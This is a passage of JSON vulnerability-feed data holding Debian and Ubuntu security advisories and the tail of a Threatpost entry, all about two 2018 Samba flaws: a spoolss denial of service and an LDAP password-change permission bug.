\u201cwormable\u201d exploit that spreads quickly.\n", "modified": "2018-03-13T12:56:17", "published": "2018-03-13T12:56:17", "id": "THREATPOST:D76F21DEC2B85956DB1AD5200B4FD592", "href": "https://threatpost.com/samba-patches-two-critical-vulnerabilities-in-server-software/130383/", "type": "threatpost", "title": "Samba Patches Two Critical Vulnerabilities in Server Software", "cvss": {"score": 6.5, "vector": "AV:NETWORK/AC:LOW/Au:SINGLE_INSTANCE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "debian": [{"lastseen": "2019-05-30T02:23:05", "bulletinFamily": "unix", "description": "- -------------------------------------------------------------------------\nDebian Security Advisory DSA-4135-1 security@debian.org\nhttps://www.debian.org/security/ Salvatore Bonaccorso\nMarch 13, 2018 https://www.debian.org/security/faq\n- -------------------------------------------------------------------------\n\nPackage : samba\nCVE ID : CVE-2018-1050 CVE-2018-1057\n\nSeveral vulnerabilities have been discovered in Samba, a SMB/CIFS file,\nprint, and login server for Unix. The Common Vulnerabilities and\nExposures project identifies the following issues:\n\nCVE-2018-1050\n\n It was discovered that Samba is prone to a denial of service\n attack when the RPC spoolss service is configured to be run as an\n external daemon.\n\n https://www.samba.org/samba/security/CVE-2018-1050.html\n\nCVE-2018-1057\n\n Bjoern Baumbach from Sernet discovered that on Samba 4 AD DC the\n LDAP server incorrectly validates permissions to modify passwords\n over LDAP allowing authenticated users to change any other users\n passwords, including administrative users.\n\n https://www.samba.org/samba/security/CVE-2018-1057.html\nhttps://wiki.samba.org/index.php/CVE-2018-1057\n\nFor the oldstable distribution (jessie), CVE-2018-1050 will be addressed\nin a later update. 
Unfortunately the changes required to fix\nCVE-2018-1057 for Debian oldstable are too invasive to be backported.\nUsers using Samba as an AD-compatible domain controller are encouraged\nto apply the workaround described in the Samba wiki and upgrade to\nDebian stretch.\n\nFor the stable distribution (stretch), these problems have been fixed in\nversion 2:4.5.12+dfsg-2+deb9u2.\n\nWe recommend that you upgrade your samba packages.\n\nFor the detailed security status of samba please refer to its security\ntracker page at:\nhttps://security-tracker.debian.org/tracker/samba\n\nFurther information about Debian Security Advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: https://www.debian.org/security/\n\nMailing list: debian-security-announce@lists.debian.org\n", "modified": "2018-03-13T09:50:11", "published": "2018-03-13T09:50:11", "id": "DEBIAN:DSA-4135-1:EA2D3", "href": "https://lists.debian.org/debian-security-announce/debian-security-announce-2018/msg00061.html", "title": "[SECURITY] [DSA 4135-1] samba security update", "type": "debian", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}}], "ubuntu": [{"lastseen": "2019-05-29T19:21:32", "bulletinFamily": "unix", "description": "Bj\u00f6rn Baumbach discovered that Samba incorrectly validated permissions when changing account passwords via LDAP. An authenticated attacker could use this issue to change the password of other users, including administrators, and perform actions as those users. (CVE-2018-1057)\n\nIt was discovered that Samba incorrectly validated inputs to the RPC spoolss service. An authenticated attacker could use this issue to cause the service to crash, resulting in a denial of service. 
(CVE-2018-1050)", "modified": "2018-03-13T00:00:00", "published": "2018-03-13T00:00:00", "id": "USN-3595-1", "href": "https://usn.ubuntu.com/3595-1/", "title": "Samba vulnerabilities", "type": "ubuntu", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}}]}